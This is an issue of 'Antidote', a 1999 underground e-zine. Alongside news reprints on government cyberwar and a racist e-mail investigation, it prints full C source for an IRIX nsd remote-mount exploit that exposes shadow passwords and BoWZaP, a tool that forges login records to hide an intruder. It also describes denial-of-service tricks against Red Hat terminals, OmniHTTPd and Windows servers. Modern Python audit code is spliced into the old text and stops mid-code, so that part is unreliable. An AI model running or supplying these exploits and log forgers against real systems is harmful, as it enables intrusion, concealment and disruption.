Volume 2 Issue 8 6/11/99

http://www.thepoison.org/antidote

------------------------------

Yes! This is a special issue with an extra area of content! We have a section that will only be printed in this issue about what is happening with AntiOnline. We have collected information from other sites and put it together in this issue for you to see! It was written/put together by Lord Oak. All credit is given to where it was taken from.

Sorry that there is not much news content in this issue. It is just that the AntiOnline portfolio took up a lot of time and took away time from gathering news.

In this issue of Antidote, we have over 670 subscribers and are getting more every day! The only thing that we ask of you when you read Antidote is that you go to: www.thepoison.org/popup.html and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you.

--=\\Contents\\=--

0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News
1.01 - A Mouse that Roars
1.02 - Stanford Tracking Racist E-mails
2.00 - Exploits (new & older)
2.01 - nsdadv.c.txt
2.02 - bowzap.c.txt
2.03 - redhat6_0.permissions.dos.txt
2.04 - omnihttpd.webserver.txt
2.05 - windows.prn.txt
3.00 - Misc
3.01 - Red Box made easy
3.02 - Conventions & Expo's
3.03 - Securing Linux
----
--=\\AntiOnline Portfolio Contents\\=--
AO.00 - Info on AntiOnline
AO.01 - wired.com
AO.02 - E-mails from Attrition
AO.01A - Email #1
AO.01B - Email #2
AO.03 - AntiOnline's Response
AO.04 - Added Comments
----
FUN.S - FUN STUFF, stupid things that have no purpose or reasoning. It is just something totally stupid and MAYBE even humorous to some.
SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just plain making fun of something or someone.
FEAT.S - FEATURED SITES:
www.nudehackers.com
www.thepoison.org/masters/exploits.html
www.403-security.org
www.hackernews.com

------------------------------

0.01 --=\\What?\\=--

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, because that would be wrong. We don't claim to be a hacking magazine. All Antidote is, basically, is current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc., then you might want to go to your local bookstore and see if they carry '2600'.

------------------------------

0.02 --=\\FAQ\\=--

Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions, and if the question isn't on here or doesn't make sense, then you can e-mail us with your question.

> What exactly is "Antidote"?
See section 0.01 for a complete description.

> I find Antidote is not aimed at the beginner and does not teach you the basics, why is that?

Antidote is for everyone. All we basically are is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are received second hand (sent to us) and we very rarely edit anyone's articles.

> I just found Antidote issues on your webpage, is there any way I can get them sent to me through e-mail?

Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive a link to the current Antidote (where you can view it).

> If I want to submit something, are there any 'rules'?

Please see section 0.03 for a complete description.

> If I submitted something, can I remain anonymous?

Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue, why is that?

It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?

Yes you can, we take information that is written by anyone regardless of whether you wrote it or not.

Well, that's it for our FAQ. If you have a question that is not on here, or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.

------------------------------

0.03 --=\\Shouts\\=--

These are just some shout outs that we feel we owe to some people.
Some are individuals and some are groups in general. If you are not on this list and you feel that for some reason you should be, then please contact Lord Oak and he will post you on here, and we are sorry for the misunderstanding. Well, here are the shout outs:

Lord Oak
EazyMoney
Duece
opt1mus
PBBSER
oX1dation
Forlorn
Retribution
0dnek
www.thepoison.org

Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you.

------------------------------

0.04 --=\\Writing\\=--

As many of you know, we are always open to articles/submissions. We will take almost anything that has to do with computer security. This leaves you open for:

-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it.

Also, please note that if we receive two e-mails with the same topic/idea then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask whether someone has already written on a topic, so that you don't waste your time writing something that won't be published. An example of this would be: if Joe sends me an e-mail with the topic being on hacking hotmail accounts on Thursday, and then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue!
If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it).

------------------------------

http://www.403-security.org - For the latest hacks and news

1.01 --=\\A Mouse that Roars\\=--
[www.washingtonpost.com]

Last week, Newsweek reported that President Clinton approved a covert operation in May to find an electronic silver bullet to do what the White House at the time believed the air war couldn't. According to the report, the CIA would conduct a cyberwar against Milosevic, specifically going after his financial assets in banks throughout Europe.

Is the keyboard mightier than the sword? Before Allied Force, the intelligence agencies held a cyberwar exercise to answer this very question. At center stage was the Information Operations Technology Center (IOTC), activated last year and made up of the best cyberwarriors of the U.S. government. Housed at National Security Agency headquarters at Fort Meade, Md., IOTC brings together highly secret capabilities: NSA's P42 information warfare cell, the CIA's Critical Defense Technologies Division, the Pentagon's "special technology operations."

Military sources familiar with the March demonstration say there is no question that the keyboard covert operators wowed the Joint Staff with their computer attack capabilities. But they are adamant in insisting that cyberbombs are more laboratory technologies than usable weapons. In fact, the sources point out, the only cyberwar raging is inside the U.S. government where Washington lawyers and policymakers, military leaders, and official hackers battle over the value and legality of network attack.

Where's The Bits?
The day bombs started falling on Yugoslavia, the Air Force Association convened a high-level symposium in San Antonio, Tex., to address the status of information warfare. Washingtonpost.com has obtained a transcript of the two-day proceeding.

Gen. John Jumper, commander of U.S. Air Forces in Europe, joined the closed-door session via satellite from his headquarters in Germany. "I have not had much sleep over the last 48 hours, and I am probably not as sharp or prepared as I would like to be," he apologized.

Tired or not, the senior air force officer in Europe wasted no time blasting the bias of information warriors to fight battles solely at the "strategic level." He was referring to the very sort of effort Newsweek would speculate about two months later.

"When we hear talk of information warfare," Jumper said, "the mind conjures up notions of taking some country's piece of sacred infrastructure in a way that is hardly relevant to the commander at the operational and tactical level."

"I would submit that we are not there with information warfare," he concluded.

Networking Network Attack

Brig. Gen. John B. Baker, commander of the Air Intelligence Agency and head of the Pentagon's Joint Command and Control Warfare Center, followed Jumper. "In my hat as the air force component commander for NSA," he warned, "I spend a lot of time working ... on how to exploit what is going on out there in computer networks."

But when it comes to going beyond collecting computer transmissions as raw intelligence to actually manipulating and exploiting the "zeroes and ones" for military value, Baker said, "we have a ways to go."

Despite all the new information warfare organizations that have been established of late, he lamented that cyberwarriors did not yet have the stature of other warriors: "Effects-based warfare," that is, methods geared to achieve an outcome and not cause traditional damage, lacks the "visually pleasing destruction from an armed bomb."
Baker stressed that part of the problem in any kind of computer network attack is the concerns on the part of policy-makers in Washington with regard to legality and "traceability."

Jumper described his experience: "I picture myself around that same targeting table where you have the fighter pilot, the bomber pilot, the special operations people and the information warriors. As you go down the target list, each one takes a turn raising his or her hand saying, 'I can take that target.' When you get to the info warrior, the info warrior says, 'I can take the target, but first I have to go back to Washington and get a finding.'"

Seeking permission invariably results in artificial restrictions and hesitations in attacking targets, Jumper stressed. From a field perspective, he said, the process of seeking the "special" operation cedes too much decision-making to inside the Beltway.

Finding The Way

The unusually candid discussions of the institutional and military stumbling blocks to an information warfare future contrast with the Hollywood vision of cyberwar so common in the mainstream media these days.

Still, Maj. Gen. Bruce A. "Orville" Wright told the symposium that "Within the area of computer network exploitation, there is tremendous investment, which, with a little bit of fine tuning, can be turned into a computer network attack capability."

The IOTC, Wright said, "is a great organization that has a bright future." He should know. As Deputy Director for Information Operations for the Joint Chiefs of Staff, he is the military head of the interagency center and the top cyber-warrior in the U.S. military.

But the key word is future. With the shooting war against Yugoslavia over, it should be crystal clear to anyone that exotic American cyberbombs have not aided the effort in any way.
http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm

------------------------------

1.02 --=\\Stanford Tracking Racist E-mails\\=--
[www.yahoo.com]

Stanford University has turned loose its electronic bloodhounds to track the source of racist e-mail sent to 25,000 campus computer users over the weekend.

The one-paragraph message accused the university of giving preference in housing to non-whites, said Rachel Lotan, a professor in the School of Education who received the e-mail. The message was so racist ``it took my breath away,'' she said. ``It must be someone very angry.''

A housing shortage for students has been a problem at Stanford for some time. Last week, some 1,300 students were not selected in the lottery held for scarce campus housing. Last year, almost 900 missed out.

Prosecutor Julius Finkelstein, head of Santa Clara County's high-tech crimes unit, said the hacker could be charged with such offenses as unauthorized use of a computer account and harassment via e-mail.

http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990603/tc/racist_mail_1.html

------------------------------

http://www.nudehackers.com

2.01 --=\\nsdadv.c.txt\\=--

I've been waiting since February for SGI to post an advisory about this. Enough.

/******************************************************************************
IRIX 6.5 nsd virtual filesystem exploit

Author: Jefferson Ogata (JO317)

Please note that this program comes with NO WARRANTY WHATSOEVER. Your use of this program constitutes your complete acceptance of all liability for any damage or loss caused by the aforesaid use.
It is provided to the network community solely to document the existence of a vulnerability in the security implementations of certain versions of IRIX, and may not be used for any illicit purpose.

Many of the details of the bug this program exploits have been available to users of SGI's online support system since February 1999. The current revision of IRIX (6.5.3) corrects this bug, at least enough to stop this particular exploit, and I strongly encourage you to bring your systems up to date as quickly as possible.

With IRIX 6.5, SGI has moved all name services, NIS services, and DNS lookups into a userland process called nsd, which exports the results of the queries it fields into a virtual filesystem. The virtual filesystem is normally mounted onto the directory /ns by the program /sbin/nsmount, which is invoked by nsd on startup. The nsd daemon itself is exporting the filesystem via NFS3 over a dynamically bound UDP port -- rather than a well-known or settable one -- typically in the 1024-1029 range. On a desktop system, 1024 is a good bet, since nsd is usually the first RPC/UDP service to be started.

The NFS filesystem is not registered with mountd, so there is no way to query mountd for a mount filehandle. But because the NFS port is fairly easy to discover through port scanning, and because the mount filehandle nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd filesystem from a host anywhere on the Internet. nsd will serve an array of NFS requests to anyone. Furthermore, because the service's NFS port is bound dynamically, it is difficult to protect it with a firewall; it may change from one system start to another, or if the daemon is killed and restarted.

This program can successfully mount the nsd-exported virtual filesystem from a remote host onto a machine running IRIX 6.4 or higher. It makes use of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher.
I do not know what this flag does at the NFS protocol level, but it allows the client to ask the NFS server not to enforce certain permissions controls against the client. I don't know whether any other vendor NFS client systems support this flag. A clever person might write a userland NFS client that would accept an initial handle, NFS port, etc. as arguments.

On an SGI with SGI C compiler, compile with:

cc -o nsdadv nsdadv.c

Run it this way:

nsdadv /mnt sucker.example.com 1024

with obvious substitutions.

So what are the security implications of this? Well, at the very least, the nsd filesystem on an NIS server reveals the NIS domain name, and what maps it contains, as well as what classes are being used. By exploring the filesystem shortly after it has been mounted I have been able to retrieve data that should be hidden from me, including shadow password entries from a remote system's shadow file.

Beyond retrieving keys and maps, you can also monitor the filesystem for changes. A great deal of information is leaked through the contents of the nsd filesystem. For example, if host A looks up host B's IP address, a file named B will appear in the /.local/hosts.byname directory in A's nsd filesystem. The file's contents will be the IP address.

By the way, though you may be unable to chdir into a particular location in the nsd filesystem, you may yet succeed under slightly different conditions. Eventually you can do it. I'm not sure why or when, but nsd gets picky sometimes. Eventually it relents. Specifically, I've found that the entire nsd filesystem appears readable for a few seconds after it is initially mounted. If you can't look at something, unmount the filesystem, remount it, and try again immediately. It also seems that a stat() is sometimes required before a chdir(). Your mileage may vary, but keep trying. You may wish to write a script to mount the nsd filesystem, explore and take inventory of its contents, and unmount the filesystem quickly.
Once you've chdir'd into a directory, it appears you can always read it, although you can't necessarily stat its contents. This suggests a strategy of spawning a group of processes each with its cwd set to a subdirectory of the nsd filesystem, in order to retain visibility on the entire filesystem. Each process would generate an inventory of its cwd, and then monitor it for changes. A Perl script could do this well.

Another thing: it is possible to create an empty file in nsd's exported filesystem simply by stat()ing a nonexistent filename. This suggests a potential DoS by creating many files in a directory.

Remember that the system keeps a local cache in /var/ns, so you may have to wait for cached entries on the target host to expire before you'll see them reappear in the virtual filesystem.

For some fairly extensive info on the nsd implementation, take a look at:

http://www.bitmover.com/lm/lamed_arch.html

******

What got me into all this was that I found I could no longer run services chrooted if they required DNS. It took considerable effort to come up with a solution to this. This was a fundamental change from IRIX 6.4, and I know I'm not the only one who finds the nsd implementation to be a generally unpleasant direction, in part because it causes umount -t nfs to break system database services.

I give SGI points for creativity -- in one sense, using NFS as a database access system is a very slick approach. But the database needs a security model, and the model needs to be implemented correctly. Neither of these needs appears to have been met.

So how could SGI fix this? Without going back, SGI could at least make nsd respond only to queries from localhost (see note below about IRIX 6.5.3). The problem here is that they actually intend to support remote mounts in later releases, in order to supplement or supplant other means of distribution. The web documents indicate this.
They could create a well-randomized mount filehandle for the filesystem and pass that to nsmount. Then you couldn't remotely mount the filesystem without guessing the handle -- nontrivial with a 32-byte handle.

At the very least, they should provide libraries of regular BIND resolver routines, file-based getpwent, etc. routines, so one could choose the resolution strategy at link time, perhaps by modifying the shared library path.

******

With IRIX release 6.5.3, SGI appears to have fixed this problem, at least to some degree. The exploit does not appear to work as it does against 6.5.2. Further testing is needed, and the behavior should be watched carefully in future versions of IRIX.
******************************************************************************/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Filesystem type name for nsd-exported filesystem. */
#define NSD_FSTYPE "nfs3"

/* File that records mounted filesystems. */
#define MTAB_FILE "/etc/mtab"

/* Socket address we'll fill in with our destination IP and port. */
struct sockaddr_in sin;

/* All zero file handle. This appears to be the base handle for the nsd
   filesystem. Great security, huh? */
unsigned char fh[NFS_FHSIZE] = { 0 };

/* NFS mount options structure to pass to mount(2). The meanings of these are
   documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The flags
   field indicates that this is a soft mount without log messages, and to set
   the initial timeout and number of retries from fields in this structure.
   The fh field is a pointer to the filehandle of the mount point, whose size
   is set by fh_len. As noted above, the mount point filehandle is just 32
   zeroes.
*/
struct nfs_args nx = {
    &sin,                                                   /* addr */
    (fhandle_t *) fh,                                       /* fh */
    NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC,    /* flags */
    0,                                                      /* wsize */
    0,                                                      /* rsize */
    100,                                                    /* timeo */
    2,                                                      /* retrans */
    0,                                                      /* hostname */
    0,                                                      /* acregmin */
    0,                                                      /* acregmax */
    0,                                                      /* acdirmin */
    0,                                                      /* acdirmax */
    0,                                                      /* symttl */
    { 0 },                                                  /* base */
    0,                                                      /* namemax */
    NFS_FHSIZE,                                             /* fh_len */
    /* On IRIX 6.4 and up there are also the following... */
    /* bdsauto */
    /* bdswindow */
    /* On IRIX 6.5 there are also the following... */
    /* bdsbuflen */
    /* pid */
    /* maxthreads */
};

void usage (void)
{
    fprintf (stderr, "usage: nsmount_remote directory host port\n\n");
    fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on via NSD daemon\n");
    fprintf (stderr, "port onto .\n\n");
    exit (1);
}

int main (int argc, char **argv)
{
    char *dir;
    char *host;
    char *ports;
    int port;
    struct hostent *h;
    int fstype;
    FILE *mtabf;
    struct mntent mnt = { 0, 0, NSD_FSTYPE, "soft,timeo=100,retrans=2", 0, 0, };

    if (argc != 4)
        usage ();

    dir = argv[1];
    host = argv[2];
    port = atoi ((ports = argv[3]));

    /* Prepare for host lookup. */
    memset ((void *) &sin, 0, sizeof (sin));
    sin.sin_family = 2;
    sin.sin_port = port;

    /* Look up the host. */
    if (inet_aton (host, &sin.sin_addr))
        ;
    else if ((h = gethostbyname (host)))
    {
        unsigned long *l = (unsigned long *) *(h->h_addr_list);
        sin.sin_addr.s_addr = l[0];
    }
    else
    {
        fprintf (stderr, "Cannot resolve host %s.\n", host);
        return 1;
    }

    /* Get filesystem type index for nsd filesystem type. */
    if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0)
    {
        perror ("sysfs (" NSD_FSTYPE ")");
        return 1;
    }

    fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n",
             host, inet_ntoa (sin.sin_addr), port, dir);

    /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR means
       "tell server to trust us with attributes" and MS_DATA means "6-argument
       mount". MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack
       doesn't seem to work without this option. So even though this program
       will compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to
       attack nsd. */
    if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx)) != 0)
    {
        perror ("mount");
        return 1;
    }

    /* Record mount point in /etc/mtab. */
    mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1);
    sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports);
    mnt.mnt_dir = dir;
    if (!(mtabf = setmntent (MTAB_FILE, "r+")))
    {
        perror ("setmntent");
        return 1;
    }
    if (addmntent (mtabf, &mnt) < 0)
    {
        perror ("addmntent");
        return 1;
    }
    if (endmntent (mtabf) < 0)
    {
        perror ("endmntent");
        return 1;
    }
    return 0;
}

Jefferson Ogata
ogata@POBOX.COM

------------------------------

2.02 --=\\bowzap.c.txt\\=--

/*
 * BoWZaP 1.0 - k-sp1ff h4qR tYp3 l0g ed1t0r ph0r 4.4BSD/SunOS4/Linux
 *
 * say u r l0gg3d 1nt0 cert.org as 'sp4f' on ttyp2 & want t0 b
 * m1sch13v0us.. u w0uld th3n d0:
 *
 * [sp4f@cert][~] % su -
 * Password: b0w-t13z
 * # ./BoWZaP sp4f justin.kalinas.home.machine ttyp2
 *
 * 0r t0 ch4ng3 4ll 1nst4nc3z 0f sp4f jU$t l34v3 0ut th3 ttY argUm3nt..
 *
 * u k4n alz0 uz3 1t t0 1mpr3$$ uR fr13ndz & tr1ck th3m 1nt0 g1v1ng
 * u k0d3z .. i.e. m4k3 1t l00k l1k3 uR 0n fr0m zang.com or s0m3th1ng,
 * th3n ppl w1ll l1k3 t0tally ph34r u & stUph.
 *
 * k0mp1l3 w/ [g]cc -O[2] -o BoWZaP BoWZaP.c [-DSUNOS] -s
 *
 * w0rd!@#
 * - K0d3S|aY3r [b4dd3r & k-r4dd3r th4n ev3r 1n '99]
 */

#include
#include
#include
#include
#include

#ifdef SUNOS
#include
#define _PATH_UTMP "/etc/utmp"
#define _PATH_WTMP "/var/adm/wtmp"
#define _PATH_LASTLOG "/var/adm/lastlog"
#endif

int main(ac, av)
int ac;
char **av;
{
    int fd;
    struct utmp ut;
    struct lastlog ll;
    struct passwd *pw;

    if(ac<3) {
        fprintf(stderr,"Usage: %s user fakehost [tty]\n",av[0]);
        exit(1);
    }
    if((pw=getpwnam(av[1])) < 1) {
        fprintf(stderr,"Not in /etc/passwd.\n");
        exit(1);
    }
    if((fd=open(_PATH_UTMP,O_RDWR)) < 0) {
        fprintf(stderr,"Couldn't open %s\n",_PATH_UTMP);
        exit(1);
    }
    while(read(fd,&ut,sizeof(ut)) > 0) {
        if(!strncmp(ut.ut_name,av[1],strlen(av[1]))) {
            if(!av[3] || (av[3] && !strncmp(ut.ut_line,av[3],strlen(av[3])))) {
                memcpy(ut.ut_host, av[2], sizeof(ut.ut_host));
                lseek(fd, (int)-sizeof(ut), SEEK_CUR);
                write(fd, &ut, sizeof(ut));
            }
        }
    }
    close(fd);
    printf("%s successfully altered.\n", _PATH_UTMP);

    if((fd=open(_PATH_WTMP,O_RDWR)) < 0) {
        fprintf(stderr,"Couldn't open %s\n",_PATH_WTMP);
        exit(1);
    }
    lseek(fd,(long) -(sizeof(ut)), SEEK_END);
    while(read(fd,&ut,sizeof(ut)) > 0) {
        if(!strncmp(ut.ut_name,av[1],strlen(av[1]))) {
            if(!av[3] || (av[3] && !strncmp(ut.ut_line,av[3],strlen(av[3])))) {
                memcpy(ut.ut_host, av[2], sizeof(ut.ut_host));
                lseek(fd, (int)-sizeof(ut), SEEK_CUR);
                write(fd, &ut, sizeof(ut));
                break;
            }
        }
        lseek(fd, (long) -(sizeof(ut) * 2), SEEK_CUR);
    }
    close(fd);
    printf("%s successfully altered.\n",_PATH_WTMP);

    if((fd=open(_PATH_LASTLOG,O_RDWR)) < 0) {
        fprintf(stderr,"Couldn't open %s\n",_PATH_LASTLOG);
        exit(1);
    }
    lseek(fd, (long)pw->pw_uid * sizeof(struct lastlog), 0);
    memcpy(ll.ll_host,av[2],sizeof(ll.ll_host));
    if(av[3]) {
        memcpy(ll.ll_line,av[3],sizeof(ll.ll_line));
    }
    write(fd, (char *)&ll, sizeof(ll));
    close(fd);
    printf("%s successfully altered.\n", _PATH_LASTLOG);
}

------------------------------

2.03 --=\\redhat6_0.permissions.dos.txt\\=--

Once again I've come up with another trivial Denial of Service flaw (wow, I seem to be good at this: Conseal Firewall, +++ath0, ppp byte-stuffing). It's been a few months since my last DoS, so here you go:

Many of you RedHat 6.0 users who installed RedHat 6.0 rather than upgrading may have noticed the new way RedHat displays remote TTY's. Instead of the old fashioned /dev/ttyp, it now uses /dev/pts/. There is a flaw in this new implementation that local users can exploit to cause minor disruption to anyone using X-windows on the local machine. This DoS is more of a nuisance than a "real problem" but it could possibly be used to cause some minor havoc.

The way it works is simple. When whoever is using X opens up an "xterm" (eterm, rxvt, nxterm...) a connection is made to the X server. If you do a "who" you will see (RedHat 6.0, without upgrading from previous RedHat release):

wage pts/0 Jun 6 01:39 (:0.0)

Or on older versions:

wage ttyp0 Jun 6 01:39 (:0.0)

Now this is normal, but the problem lies within the permissions of that device. On older RedHat's if you did:

ls -l /dev/ttyp3

you would see:

crw------- 1 wage tty 3, 0 Jun 6 12:41 /dev/ttyp0

Which is normal and what it should look like. For those of you who may be new to unix, those letters at the beginning of the line indicate the permissions on the device. For our output above, the line indicates it is a device (c), and that the OWNER has read and write permissions (rw), Group has no permissions (---), and everyone has no permissions (---). They basically go like this; an example line of a device with ALL permissions set follows:

crwxrwxrwx
  /   |   \
Owner Group Everyone

This means that everyone has read/write/execute permissions to that device. So as you can see our ttyp0 can only be read or written to by its owner (and root).
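The mode-string reading just described (type, owner, group, other) is what an auditor applies when checking terminal devices. As an added example that is not part of the noc-wage post, the Python below parses the kind of lines `ls -l /dev/ttyp* /dev/pts/*` prints and flags any terminal that someone other than its owner can write to. The sample lines are constructed for the example: the first two copy lines from the text, the third is a hypothetical pty owned by a user's private group.

```python
"""Added example, not part of the noc-wage post: audit terminal-device
permissions from `ls -l` output and flag terminals writable by anyone but
their owner. Sample input is constructed; the third line is hypothetical."""
import re
from typing import List, Optional

# Constructed sample of `ls -l` output for character devices.
SAMPLE_LS_OUTPUT = """\
crw------- 1 wage tty 3, 0 Jun 6 12:41 /dev/ttyp0
crw--w---- 1 ov3r tty 136, 0 Jun 6 12:32 /dev/pts/0
crw--w--w- 1 ov3r ov3r 136, 1 Jun 6 12:35 /dev/pts/1
"""

# mode, link count, owner, group, "major, minor", date fields..., path
LS_LINE = re.compile(
    r"^(?P<mode>[a-z-]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<major>\d+),\s*(?P<minor>\d+)\s+.*?(?P<path>/\S+)$"
)


def parse_mode(mode: str) -> dict:
    """Split a 10-character ls mode string into file type and the three permission triples."""
    if len(mode) != 10:
        raise ValueError(f"bad mode string: {mode!r}")
    return {"type": mode[0], "owner": mode[1:4], "group": mode[4:7], "other": mode[7:10]}


def audit_terminal_line(line: str) -> Optional[dict]:
    """Return a finding for one ls line, or None when only the owner (and root) can write."""
    m = LS_LINE.match(line.strip())
    if not m or m.group("mode")[0] != "c":
        return None  # not a character-device line
    perms = parse_mode(m.group("mode"))
    problems = []
    if "w" in perms["other"]:
        problems.append("world-writable")
    # Group write with group 'tty' is the normal mesg(1)/write(1) arrangement;
    # write access for any other group is flagged.
    if "w" in perms["group"] and m.group("group") != "tty":
        problems.append(f"writable by group '{m.group('group')}'")
    if not problems:
        return None
    return {"path": m.group("path"), "owner": m.group("owner"), "problems": problems}


def audit(ls_output: str) -> List[dict]:
    """Audit every line of ls output; returns the flagged terminals."""
    return [f for f in map(audit_terminal_line, ls_output.splitlines()) if f]


if __name__ == "__main__":
    # On a live box, feed audit() the captured stdout of `ls -l /dev/pts/` instead.
    for finding in audit(SAMPLE_LS_OUTPUT):
        print(finding)
```

The group rule is deliberately narrow: group-write with group `tty` is the arrangement `mesg y` relies on, so it is not reported, while group-write to any other group is, since a user's private group gives nobody else legitimate access and is the shape of the misconfiguration the post goes on to describe.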
In the case of RedHat 6.0 with regular remote connections (like telnet) the standard permissions are as follows:

crw--w---- 1 ov3r tty 136, 0 Jun 6 12:32 /dev/pts/0

Here it's almost the same except that group "tty" also has write access. The problem lies in the way that the permissions are set for local connections with the X server using xterm. If you do an ls -l /dev/pts/ (we will use pts/0) you get:

crw--w--w- 1 ov3r ov3r 136, 0 Jun 6 12:32 /dev/pts/0

Notice how now "everyone" has write access to this terminal? This leads to the hole that any local user can disrupt any xterminal connected to the local machine. Simply typing "cat /dev/urandom > /dev/pts/" will flood the xterm with garbage data making it impossible to use. Or we can also bring back the old "flash" attack and flash the user's xterm by dumping ASCII escape characters to his terminal. This isn't a particularly "deadly" DoS attack, but can be used as a nuisance OR perhaps even to trick the user into doing something he may not want to do. (For example dumping "Login:" then "Password:" to the terminal may trick the user into adding his login/password to a file or to his .bash_history).

noc-wage
wage@IDIRECT.CA

------------------------------

2.04 --=\\omnihttpd.webserver.txt\\=--

Hi all,

The exploit (bug) will make temp files on the server until the server's hdd is full. And anyone can do it remotely. By default visadmin.exe (Visitor Administrator) is in the cgi-bin directory. What you need to do is to type this url:

http://omni.server/cgi-bin/visadmin.exe?user=guest

That's all. In a few minutes the server's hdd is full!!

Fix: Remove visadmin.exe from the cgi-bin directory.

Valentin Perelġgin
viktor@PARNU.EE

------------------------------

2.05 --=\\windows.prn.txt\\=--

I suppose that, in an effort to maintain reverse compatibility with old MS-DOS command line gurus, you cannot create a file or directory named PRN.xxx where the xxx is replaceable with any extension. Explanation and flaw follow.
First, the explanation (for those of you who are familiar with the command line use of prn, please skip to the flaw).

Old style MS-DOS command line-ing would allow you to do the following to print your autoexec file:

C:\>copy autoexec.bat prn

What this actually does is redirect the contents of autoexec.bat to the port LPT1. So, as stated in the first sentence, in an effort to preserve this feature, Microsoft will not allow you to create any file or directory whose name prior to the extension is exactly PRN.

Now the flaw:

Although you cannot create a local file whose name is PRN, you can, however, jump onto a networked server (suppose its name is \\whatever) and create (in any directory that you have create permissions in) any file or directory named PRN.xxx (again, xxx stands for any extension). The server must be accessed by its \\ notation; you cannot do this if you map \\whatever\anydir to a drive (such as w:), then go to w:\ and try to create the file. In that case your machine's name parser blocks you.

Ok, so that doesn't seem so bad, but the real issue is that the directory you've just created is non-removable for as long as it possesses that name. So let's try to rename the file... oops, can't do that, we get an access violation. Next, let's try mapping \\whatever\anydir to w:\ again. I go to my new W drive and try to rename the file, I get the error "Cannot rename prn: A file with the name you specified already exists. Specify a different filename." Ooooookaaaaay. Frustrated now, I try to delete the file. Oops, now it tells me "Cannot delete prn: The parameter is incorrect."

Well, what about that file/directory I've created with the name PRN.xxx? That one vanishes with no problem, but only when the server is referenced in the \\whatever fashion. When I try to delete this PRN.xxx file from my new W: drive, all it does is lock up my window with a nearly endless hourglass. Finally, ten minutes later, I'm told "Cannot delete file: File system error (1026)."
But this only occurs after I've renamed the parent directory. The error that is reported has nothing to do with the file PRN.xxx, but instead with the fact that the file upon which it was trying to do a delete operation dissapeared between when the delete was initiated and when it was finished. Note that PRN.xxx acts somewhat differently than PRN alone. The next step is to try to delete the parent directory. This does not work! PRN still gives access violations, and so the parent directory is locked in place. So how much harm can this REALLY be? So I've got a few empty files and directories that are undeletable. Well, if in stead of just creating a new directory, I copy a large directory to the server, say c:\winnt, or perhaps c:\program files, then rename it to prn, now I've just created half a gig or more (depending on how malicious I am) of un-reclaimable server hard drive consumption. This directory cannot be browsed! It has become a sore on the surface of this hard drive. Well, remember con? The virtual file that was like prn, except that instead of echoing to LPT1, it echoes to the screen. I try to recreate this whole process with con, but the server is much too smart for that, it yells at me and tells me "Cannot create or replace file: The filename you specified is invalid or too long. Specify a different filename." I don't know, but I suspect that there exist utilities that would catch this filename's invalidity, and do something about it. Norton Disk Doctor is usually pretty good about those kinds of things. Unfortunately, I don't have local access to the servers I have available to create this flaw on, so I cannot test that. If someone can test that on various workstations and servers, I'd be interrested to know if Norton can do this. Please put your new PRN directory/file in a place that you don't care if it resides there forever. 
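The reserved-name rule described above is straightforward to enforce before a path ever reaches a server. What follows is an added example, not part of Eric Stevens' post: a Python validator that an upload tool or file-sync client could run on every component of a destination path and refuse the write if any of them is a DOS device name. It goes beyond the post's PRN case to the full set of reserved names (CON, PRN, AUX, NUL, COM1-COM9, LPT1-LPT9), which Windows handles the same way with or without an extension; the function names and the sample paths at the end are my own and are constructed for illustration.

```python
import re

# Reserved MS-DOS device names. Windows treats these as devices when they
# appear as the base name of a file or directory, with or without an
# extension (PRN, PRN.txt and PRN.tar.gz all resolve to the printer).
RESERVED_DEVICE_NAMES = frozenset(
    ["CON", "PRN", "AUX", "NUL"]
    + [f"COM{i}" for i in range(1, 10)]
    + [f"LPT{i}" for i in range(1, 10)]
)

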